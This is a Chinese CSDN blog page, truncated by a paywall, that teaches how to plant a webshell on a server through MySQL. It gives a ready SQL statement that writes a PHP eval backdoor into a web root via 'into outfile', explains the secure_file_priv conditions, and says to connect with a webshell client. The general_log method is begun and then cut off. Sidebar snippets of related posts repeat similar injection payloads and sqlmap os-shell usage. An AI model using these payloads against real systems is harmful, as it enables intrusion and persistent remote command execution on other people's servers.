MySQL数据库上传webshell的方法

最新推荐文章于 2024-08-05 22:16:17 发布
最新推荐文章于 2024-08-05 22:16:17 发布
阅读量826 收藏 2
点赞数
分类专栏: MySQL上传shell 文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42373409/article/details/108594618
版权
本文介绍了三种在MySQL数据库中上传webshell的方法:1) 使用into outfile方法,通过配置secure_file_priv参数并执行特定SQL语句;2) 利用general_log日志写入,开启日志功能并将日志路径设为shell目标路径;3) 通过数据库备份方式,结合Web研究实现webshell上传。每种方法都涉及到不同的SQL语句和系统配置。
摘要由CSDN通过智能技术生成

1.into outfile方法

在mysql.ini配置文件中参数secure_file_priv的取值决定了写入开关的状态;
(1)secure_file_priv=NULL;–>表示写入开关关闭;
(2)secure_file_priv=“”;–>表示写入开关打开;
(3)secure_file_priv=“web路径”;–>表示写入开关打开,并写入指定路径下,如果写入路径不是web路径,则无法通过此种方法写入webshell。
修改该参数只能通过修改mysql.ini完成,命令行无法完成。
上传的sql语句

select "<?php @eval($_POST['hack']);?>" into outfile "C://phpstudy//PHPTutorial//WWW//shell.php"

后续利用菜刀进行连接;

2.general_log日志写入

该方法的原理是通过打开日志功能,将日志文件路径设为shell上传的路径;然后向shell文件中写入shell语句

最低0.47元/天 解锁文章
huihui_zyh
关注
专栏目录
深入理解MySQL安全(二)-数据库权限和webshell
zhujiu_fu的博客
02-13 199
本文深入浅出的讲解了数据库权限对数据库安全的作用及获取webshell方法和思路,最后阐述了如何才能获取一个稳定的shell方法和思路。
数据库上传WebShell的三种方式
m0_48520508的博客
08-08 3457
一、什么是WebShell? 简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。 为了更好理解WebShell我们学习两个概念: 什么是“木马”? “木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市.
复现mysql 备份上传木马,并用shell工具连接操作
weixin_64655821的博客
08-25 353
复现mysql 备份上传木马,并用shell工具连接操作
【getshellMySQL上传webshell
ssrf
10-20 847
文章目录一、select into outfile直接写入1、利用条件2、查看secure_file_priv值3、写入一句话二、利用全局日志写shell1、查看配置2、开启general_log模式3、修改日志目录为shell地址4、写入shell5、抹除痕迹 一、select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secur
SQL注入之webshell上传
最新发布
aihua002的博客
08-05 343
1.高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限,所以该选项为可以=‘“”/=一个路径,不能为NULL,secure_file_priv=“” 代表文件读写没有限制,secure_file_priv=一个路径,代表只能对该路径下文件进行读写,而secure_file_priv=NULL 代表不能对文件进行读写。首先webshell上传就是利用MySQL的文件读写注入而实现,要想上传webshell就得了解文件读写注入的原理。
网络安全系列之六 利用数据库备份上传WebShell
weixin_33774308的博客
10-09 241
在成功获得了网站管理员的账号和密码之后,我们就可以通过之前已经找到的后台管理入口来进入网站后台了。 此时我们就已经拿下这个网站,可以对网站的内容进行任意修改。但对于***,拿下网站绝不是目的,其最终目的是拿下整台服务器,使之成为自己的“肉鸡”。只是目前我们获得的这个网站管理员相比服务器的系统管理员的权限还有很大差距,因而下一步要做的工作就是“提权”,也就是获得系统管理员的权限。目前,提权主要是借助...
MySQLWebShell总结
Poolhuang的博客
05-27 460
1、写入方式 ①、基于outfile写入 union select 例:?id=1 union select '<?php phpinfo() ?>' into outfile '物理路径' ; ###利用分隔符写入 lines terminated by ::设置每行结尾的字符,可以为单个或多个字符,默认值为‘\n’;可以理解为 以每行终止的位置添加 xx 内容。 例:?id=1 into outfile '物理路径' lines terminated by '<?php .
如何向mysql写入wbeshell
ws1813004226的博客
03-23 897
如何向mysql写入wbeshell 一、成功写入wbeshell必须满足的4个条件: (1)数据库拥有root权限或拥有file权限。 (2)知道网站的绝对路径。 (3)PHP的GPC参数为OFF状态。 (4)MYSQL中的secure_file_priv参数不能为NULL。 二、写入方法 1.使用outfile方法。outfile是mysql提供的一个用来写入文件的函数,当我们可以控制写入文件的内容以及文件的保存路径时,我们就可以上传一个webshell。 2.基于日志写入法。将日志文件的导出目录修改成
获取webshell方法
songbai220
12-11 704
获取webshell方法 CMS获取webshell 通过搜索引擎搜索CMS网站程序名称 phpcms拿Webshell、WordPress后台拿Webshell等 非CMS获取webshell 1、数据库备份获取webshell 1、上传图片木马并获取上传后图片访问地址 2、利用后台数据库备份方法,备份图片木马,并重命名(名称+后缀),获取访问地址 3、访问备份木马文件,获取webshell 2、抓包获取webshell 3、SQL命令执行获取webshell Select ‘<? ph
MySQL数据库安全测试
d59hao的博客
05-11 274
Mysql管理工具有多种,比如phpMyAdmin网站管理系统,Navicat for MySQL以及MysqlFront等客户端工具。这些工具有的会直接保存配置信息,这些信息包含数据库服务器地址和数据库用户名以及密码,通过嗅探或者破解配置文件可以获取密码等信息。
MySQL导出一句话拿WebShell方法
06-19
MySQL导出一句话拿WebShell方法
MySQL注入点写入WebShell的几种方式
热门推荐
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
mysql数据写入突然慢了_通过MySQL写入webshell的几种方式
weixin_39648824的博客
11-28 324
当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据库写入webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据库写入webshell方法,以拿到phpMyAdmin为例。-01-通过outfile写入shell利用条件:1、root权限2、网站的绝对路径...
上传webshell并获取数据库密码
qq_43776408的博客
05-20 1184
因为此处用的菜刀是java的 所以你要搭建java环境 然后通过xshell上传菜刀 上传之后,由于你上传的是jar文件 所以打开方式要注意 菜刀让你填密码 这个密码就是你在一开始上传上去的 回去看 点击添加 成功 最后我们上传webshell 上传成功后可以在任何机器访问shell 如果我们想要知道数据库密码 先找到config目录 下面有一个文件叫config_global,打开它。里面就有密码 结束 ...
MSSQL注入之木马上传webshell
Jim的博客
08-16 4399
1.检测是否存在注入点:依次添加语句',and 1=1和and 1=2,来判断网站是否存在注入点 2.利用语句:a' having 1=1--爆出表名和字段名AdminUser.AdminId 3.接着爆出其他字段: a' group by adminuser.adminid having 1=1--  //爆出用户名字段 a' group by adminuser.adminid,adm
MYSQL注入|文件读写|获取敏感信息|上传getshell|绕过宽字节、magic_quotes_gpc
没有
04-09 4197
文章目录1.SQL注入的思维导图2.MYSQL注入思维导图3.文件读写获取路径常见方法(1).报错显示(2).遗留文件(3).漏洞报错(4).平台配置文件(5). 爆破文件读写函数(1)load_file():读取函数(2)into outfile或iinto dumpfile:导出函数写入WebShell的几种方式 1.SQL注入的思维导图 2.MYSQL注入思维导图 3.文件读写 文件读写操作: load_file():读取函数 into outfile或iinto dumpfile:导出函数 会用
使用shell进行mysql数据统计并上传
greenery的专栏
12-05 982
(这是批处理的旧版本) 需求如下: 对指定数据库进行统计,输出结果为文本格式,TAB进行分割,不带列标题,文件名为“日期_统计名.dat"对统计结果计算md5,并写入“日期_统计名.dat.md5"对统计结果进行压缩,并写入“日期_统计名.dat.7z"上传md5,和7z文件 #!/bin/sh #每日统计脚本 #每天零点开始统计前一天的数据,并打包上传到指定服务
SQLmap使用指南:数据库提权与Webshell获取
3. MySQL数据库的提权 对于MySQL,SQLmap可以直接连接数据库并尝试获取shell。例如,使用`-d "mysql://root:123456@192.168.1.120:3306/test" --os-shell`可以直接进入操作系统shell,有时甚至获得系统权限。 4. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值